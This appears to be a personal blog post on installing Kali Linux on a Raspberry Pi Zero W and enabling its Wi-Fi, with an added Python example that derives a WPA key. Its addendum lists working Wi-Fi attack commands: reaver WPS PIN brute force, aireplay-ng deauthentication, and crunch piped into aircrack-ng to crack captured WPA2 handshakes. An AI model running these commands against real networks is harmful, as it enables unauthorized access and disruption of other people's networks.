Sep 18, 2017

raspi0w + kali linux + how to enable wi-fi card

Kali Linux download site for Raspberry Pi

Below are the steps to take when the built-in Wi-Fi device (wlan0) is not recognized.

1) I installed Kali on the SD card.

2) Put the SD card in another Pi using a USB to microSD adapter
 (Insert the SD card into another, already booted Raspbian (Pi) environment.)

3) Then mount the 2 partitions from the card under /mnt and /mnt/boot
 mount /dev/sda2 /mnt/
 mount /dev/sda1 /mnt/boot/

4)rpi-update the kali image
 ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update

5)change root to the kali image
 chroot /mnt/ /bin/bash

6)update the thing
 apt-get update
 apt-get upgrade

7)install the wireless driver
 apt-get install firmware-brcm80211

 * In my environment this gives a "404  Not Found" error, but,

8) Copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a Raspbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on Kali

9)edit /etc/network/interfaces
 auto wlan0
 iface wlan0 inet dhcp
 wpa-ssid "mysupercoolssidofdoom"
 wpa-psk "mysupercoolpasswordofdoom"

10) Exit the chroot, umount the partitions and eject the card

"That will get you Kali on the Pi Zero W with wireless networking. But I cannot get Bluetooth to work, and I soooooooo want to use my Bluetooth keyboard with it. Sorry about my formatting, typing this on my phone."
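
Step 9 above leaves the Wi-Fi passphrase in clear text on the SD card. The following is an added example, not part of the quoted procedure: it derives the 256-bit WPA/WPA2 pre-shared key from the SSID and passphrase, builds the same wlan0 stanza with the key in hex, and keeps the file owner-readable only. The function names are hypothetical, and it assumes the wpasupplicant ifupdown hooks accept the unquoted 64-hex-digit form of wpa-psk, as wpa_supplicant itself does.

```python
import hashlib
import os
import stat
import tempfile


def derive_psk(ssid: str, passphrase: str) -> str:
    """WPA/WPA2-Personal PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    if not 1 <= len(ssid.encode()) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def wlan_stanza(ssid: str, passphrase: str, iface: str = "wlan0") -> str:
    """Same stanza as step 9, with the derived key (unquoted hex) instead of the passphrase."""
    return (f"auto {iface}\n"
            f"iface {iface} inet dhcp\n"
            f' wpa-ssid "{ssid}"\n'
            f" wpa-psk {derive_psk(ssid, passphrase)}\n")


def install_stanza(path: str, stanza: str) -> bool:
    """Append the stanza once and leave the file readable by its owner only."""
    existing = ""
    if os.path.exists(path):
        with open(path) as fh:
            existing = fh.read()
    changed = stanza not in existing
    if changed:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
        with os.fdopen(fd, "a") as fh:
            fh.write(("\n" if existing and not existing.endswith("\n") else "") + stanza)
    os.chmod(path, 0o600)  # the derived key still grants access to this SSID
    return changed


if __name__ == "__main__":
    # Constructed demo: writes to a temporary file, not to /mnt/etc/network/interfaces.
    demo = os.path.join(tempfile.mkdtemp(), "interfaces")
    install_stanza(demo, wlan_stanza("mysupercoolssidofdoom", "mysupercoolpasswordofdoom"))
    with open(demo) as fh:
        print(fh.read(), oct(stat.S_IMODE(os.stat(demo).st_mode)))
```

The hex key is only valid for the SSID it was derived with, and anyone who can read it can still join that network, so the file permissions matter as much as the derivation.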


・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)

・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)

・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)

-- 2018.05.01 addendum -->

Kali Tutorials


5 Steps Wi-Fi

2.airmon-ng stop wlan0
3.airodump-ng    wlan0

| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcements packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second measure over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4.wash -i wlan0 -c "target channel" -C -s
  if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360

breaking wpa2-psk (2016/02/21)

airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"

aireplay-ng --deauth 20 -a "target mac" wlan0

crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap

WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b  And Target BSSID

Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap

HowTo : Pause/Resume Aircrack-ng

where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/

reaver resume from certain pin nr. #233 (2015/03/29)
